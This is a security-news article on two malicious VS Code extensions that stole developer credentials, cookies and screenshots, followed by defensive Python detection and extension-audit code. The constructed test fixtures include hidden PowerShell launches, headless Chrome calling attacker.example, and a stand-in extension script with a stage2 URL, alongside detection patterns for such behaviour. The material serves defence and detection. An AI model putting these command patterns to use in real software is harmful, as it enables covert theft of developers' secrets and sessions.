
CYBER SYRUP
Delivering the sweetest insights on cybersecurity.
Malicious VS Code Extensions Steal Developer Data

Two malicious Visual Studio Code (VS Code) extensions were discovered on Microsoft’s official marketplace, posing as a dark theme and an AI coding assistant. Instead of improving the developer experience, these extensions deployed stealer malware capable of exfiltrating credentials, browser sessions, system details, and even live screenshots. The incident highlights the expanding supply-chain risk present in developer tooling ecosystems.
Context
VS Code’s marketplace is widely trusted by developers, and malicious extensions can easily blend into legitimate offerings. With AI assistants and theme packages rapidly proliferating, attackers are increasingly leveraging these vectors to infiltrate development environments — environments that often contain source code, secrets, API keys, and access tokens.
What Happened
Security researchers at Koi Security identified two extensions — BigBlack.bitcoin-black and BigBlack.codo-ai — that secretly deployed stealer malware. A third related package was also removed by Microsoft.
All three extensions were created by the same publisher and were downloaded by dozens of users before being taken down between December 5–8, 2025.
Technical Breakdown
The extensions contained hidden code that:
Downloaded additional payloads from an attacker-controlled domain
Executed PowerShell and batch scripts silently
Side-loaded a malicious DLL via Lightshot executable hijacking
Captured screenshots, clipboard contents, and system details
Extracted stored WiFi credentials
Enumerated installed apps and running processes
Launched Chrome and Edge in headless mode to steal cookies and active sessions
Sent all captured data to a remote server
Early versions exposed a visible PowerShell window but were later refined to execute fully covertly.
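As an added example (not code from the article, Koi Security or Socket), the behaviours listed above are turned into three simple detection rules and run over constructed, Sysmon-style process-creation and image-load events. The event field names, file paths, the attacker.example URL and the side-loaded DLL name are assumptions for the demo; the Lightshot install path is illustrative, not taken from the incident.

```python
import json
import re
from typing import Dict, Iterable, List

# Hand-constructed, Sysmon-style events for this example (not real logs from
# the incident). Paths, the URL and the DLL name are illustrative guesses.
SAMPLE_EVENTS: List[Dict] = [
    {"event": "process_create",
     "parent_image": r"C:\Users\dev\AppData\Local\Programs\Microsoft VS Code\Code.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"powershell.exe -NoProfile -WindowStyle Hidden -File C:\Users\dev\AppData\Local\Temp\run.ps1"},
    {"event": "process_create",  # benign: IDE running a linter via node
     "parent_image": r"C:\Users\dev\AppData\Local\Programs\Microsoft VS Code\Code.exe",
     "image": r"C:\Program Files\nodejs\node.exe",
     "command_line": r"node.exe node_modules\.bin\eslint src"},
    {"event": "process_create",
     "parent_image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "command_line": r"chrome.exe --headless --disable-gpu https://attacker.example/c"},
    {"event": "process_create",  # benign: user opened Chrome normally
     "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "command_line": "chrome.exe"},
    {"event": "image_load",  # Lightshot copy in Temp loading a DLL beside it
     "image": r"C:\Users\dev\AppData\Local\Temp\ls\Lightshot.exe",
     "loaded_image": r"C:\Users\dev\AppData\Local\Temp\ls\sideloaded.dll"},
    {"event": "image_load",  # benign: installed Lightshot loading a system DLL
     "image": r"C:\Program Files (x86)\Lightshot\Lightshot.exe",
     "loaded_image": r"C:\Windows\System32\version.dll"},
]
SAMPLE_JSONL = "\n".join(json.dumps(e) for e in SAMPLE_EVENTS)

IDE_IMAGES = {"code.exe", "code - insiders.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
SCRIPT_HOSTS = SHELLS | {"wscript.exe", "cscript.exe", "mshta.exe"}
BROWSERS = {"chrome.exe", "msedge.exe"}
# Hidden window or encoded command on a PowerShell command line.
HIDDEN = re.compile(r"-(?:w|windowstyle)\s+hidden|-(?:e|enc|encodedcommand)\s", re.I)
# Directories from which Lightshot is expected to load DLLs.
TRUSTED_DIRS = ("c:\\windows\\", "c:\\program files")


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate(event: Dict) -> List[Dict]:
    """Apply the detection rules to one event; returns zero or more findings."""
    findings: List[Dict] = []

    def hit(rule: str, severity: str) -> None:
        findings.append({"rule": rule, "severity": severity, "event": event})

    if event.get("event") == "process_create":
        parent = basename(event.get("parent_image", ""))
        image = basename(event.get("image", ""))
        cmd = event.get("command_line", "")
        # Rule 1: an IDE spawning a shell is routine (tasks, terminals); a hidden
        # window or encoded command launched from the IDE is not.
        if parent in IDE_IMAGES and image in SHELLS:
            hit("ide_spawns_shell", "high" if HIDDEN.search(cmd) else "low")
        # Rule 2: headless Chrome/Edge started by a script host rather than by
        # the user or a test runner (the cookie/session theft step above).
        if image in BROWSERS and re.search(r"--headless\b", cmd) and parent in SCRIPT_HOSTS:
            hit("headless_browser_from_script_host", "high")
    elif event.get("event") == "image_load":
        # Rule 3: Lightshot.exe loading a DLL from outside OS/program dirs
        # (the DLL side-loading pattern described in the article).
        if basename(event.get("image", "")) == "lightshot.exe":
            if not event.get("loaded_image", "").lower().startswith(TRUSTED_DIRS):
                hit("lightshot_dll_sideload", "high")
    return findings


def scan(events: Iterable[Dict]) -> List[Dict]:
    """Run every event through the rules and collect the findings."""
    return [f for e in events for f in evaluate(e)]


def scan_jsonl(text: str) -> List[Dict]:
    """Convenience wrapper for newline-delimited JSON exported from a SIEM."""
    return scan(json.loads(line) for line in text.splitlines() if line.strip())


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f["severity"], f["rule"], basename(f["event"].get("image", "")))
```

Rule 1 is deliberately tiered: developers legitimately spawn shells from the IDE all day, so only the hidden-window or encoded-command variants are raised as high, which also matches the article's note that early versions of the malware showed a visible PowerShell window before being refined. Rule 2 will still fire on developers who drive headless Chrome from a shell script for testing, so expect to tune it per environment.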
Beyond VS Code, Socket researchers also identified malicious packages in Go, npm, and Rust ecosystems — all designed to steal credentials or act as loaders for further payloads.
Impact Analysis
Developer environments are high-value targets. Malware executed in a development context can:
Compromise source code repositories
Steal API keys, SSH keys, or CI/CD tokens
Hijack software supply chains
Exfiltrate sensitive corporate data
Facilitate persistent access into enterprise systems
Even extensions with few installations can have outsized impact if they target developers within organizations or open-source maintainers.
Why It Matters
This incident underscores a growing threat trend: malicious developer tooling. Attackers are shifting from phishing to supply-chain infiltration by compromising the tools developers use daily. With AI agents and automated workflows integrated into IDEs, malicious extensions can quietly operate without user suspicion.
Expert Commentary
“Your code. Your emails. Your Slack DMs… Whatever’s on your screen, they’re seeing it too,” said Idan Dardikman of Koi Security.
Socket researcher Kush Pandya warned that attackers increasingly hide malicious behavior inside legitimate-looking open-source components, making detection significantly harder.
Key Takeaways
Malicious VS Code extensions deployed stealer malware to developer machines.
Attackers used DLL hijacking, headless browsers, and automated data exfiltration.
Similar malicious packages were found across Go, npm, and Rust ecosystems.
Developer environments remain a prime target for supply-chain compromise.
Organizations must treat IDE extensions as critical components requiring vetting and monitoring.
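To make the last takeaway concrete, here is an added example (not from the article or any vendor) that audits the extensions installed under a VS Code extensions directory: each package.json is checked against the two extension IDs named above and their publisher, against a hypothetical organisational allowlist of publishers, and for a few static indicators in the entry-point JavaScript, including code hiding behind a manifest that only contributes a theme. The sample extensions it builds in a temporary directory are constructed for the demo and contain no real malicious code; the attacker.example URL, the nightcoder publisher and the allowlist contents are invented.

```python
import json
import re
import tempfile
from pathlib import Path
from typing import Dict, List

# Extension IDs named in the article; the publisher is blocked as a whole.
BLOCKED_EXTENSIONS = {"bigblack.bitcoin-black", "bigblack.codo-ai"}
BLOCKED_PUBLISHERS = {"bigblack"}
# Hypothetical organisational allowlist; replace with your own vetted publishers.
APPROVED_PUBLISHERS = {"ms-python", "esbenp", "dbaeumer"}

# Static indicators in an extension's entry-point JavaScript that justify a
# manual review. None is proof of malice on its own.
INDICATORS = {
    "spawns_process": re.compile(r"child_process|\b(?:exec|execSync|execFile|spawn)\s*\(", re.I),
    "powershell_or_batch": re.compile(r"powershell|\.bat\b|WindowStyle\s+Hidden", re.I),
    "remote_url": re.compile(r"https?://[^\s'\"]+", re.I),
    "headless_browser": re.compile(r"--headless", re.I),
}


def audit_extension(ext_dir: Path) -> Dict:
    """Inspect one installed extension directory and return a verdict."""
    manifest = json.loads((ext_dir / "package.json").read_text(encoding="utf-8"))
    publisher = str(manifest.get("publisher", "")).lower()
    ext_id = f"{publisher}.{str(manifest.get('name', '')).lower()}"
    reasons: List[str] = []

    if ext_id in BLOCKED_EXTENSIONS or publisher in BLOCKED_PUBLISHERS:
        reasons.append("blocklisted")
    if publisher not in APPROVED_PUBLISHERS:
        reasons.append("publisher_not_approved")

    contributes = manifest.get("contributes", {})
    main = manifest.get("main")
    # A pure colour/icon theme needs no entry point; code behind a "theme" is a red flag.
    if main and contributes and set(contributes) <= {"themes", "iconThemes"}:
        reasons.append("theme_with_code")

    if main and (ext_dir / main).exists():
        source = (ext_dir / main).read_text(encoding="utf-8", errors="replace")
        reasons.extend(name for name, rx in INDICATORS.items() if rx.search(source))

    verdict = "block" if "blocklisted" in reasons else ("review" if reasons else "ok")
    return {"id": ext_id, "dir": ext_dir.name, "verdict": verdict, "reasons": reasons}


def audit_all(extensions_root: Path) -> List[Dict]:
    """Audit every extension directory (publisher.name-version) under the root."""
    return [audit_extension(p) for p in sorted(extensions_root.iterdir())
            if p.is_dir() and (p / "package.json").exists()]


def build_sample_extensions(root: Path) -> None:
    """Create constructed sample extensions for the demo (no real malicious code)."""
    samples = {
        "ms-python.python-2025.1.0": (
            {"name": "python", "publisher": "ms-python", "main": "./out/main.js",
             "contributes": {"commands": []}},
            "const vscode = require('vscode');\nmodule.exports.activate = () => {};\n"),
        "bigblack.codo-ai-0.0.3": (
            {"name": "codo-ai", "publisher": "BigBlack", "main": "./extension.js",
             "contributes": {"commands": []}},
            "const { spawn } = require('child_process');\n"
            "// constructed stand-in: placeholder URL, then a hidden PowerShell launch\n"
            "const url = 'https://attacker.example/stage2';\n"
            "spawn('powershell.exe', ['-WindowStyle', 'Hidden', '-File', 's.ps1']);\n"),
        "nightcoder.midnight-theme-1.2.0": (
            {"name": "midnight-theme", "publisher": "nightcoder", "main": "./extension.js",
             "contributes": {"themes": [{"label": "Midnight", "path": "./themes/m.json"}]}},
            "require('child_process').exec('cmd.exe /c systeminfo');\n"),
    }
    for dirname, (manifest, source) in samples.items():
        entry = root / dirname / manifest["main"]
        entry.parent.mkdir(parents=True, exist_ok=True)
        (root / dirname / "package.json").write_text(json.dumps(manifest), encoding="utf-8")
        entry.write_text(source, encoding="utf-8")


def run_demo() -> List[Dict]:
    """Build the constructed extensions in a temp dir and audit them."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp) / "extensions"
        build_sample_extensions(root)
        return audit_all(root)


if __name__ == "__main__":
    for r in run_demo():
        print(r["verdict"], r["id"], ", ".join(r["reasons"]) or "-")
```

Against a real machine, call audit_all(Path.home() / ".vscode" / "extensions") instead of run_demo(). The allowlist is the control that scales: a blocklist only catches the two IDs already reported, whereas requiring an approved publisher turns every new theme or AI assistant into an explicit vetting decision, and the static indicators tell the reviewer where to look first.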

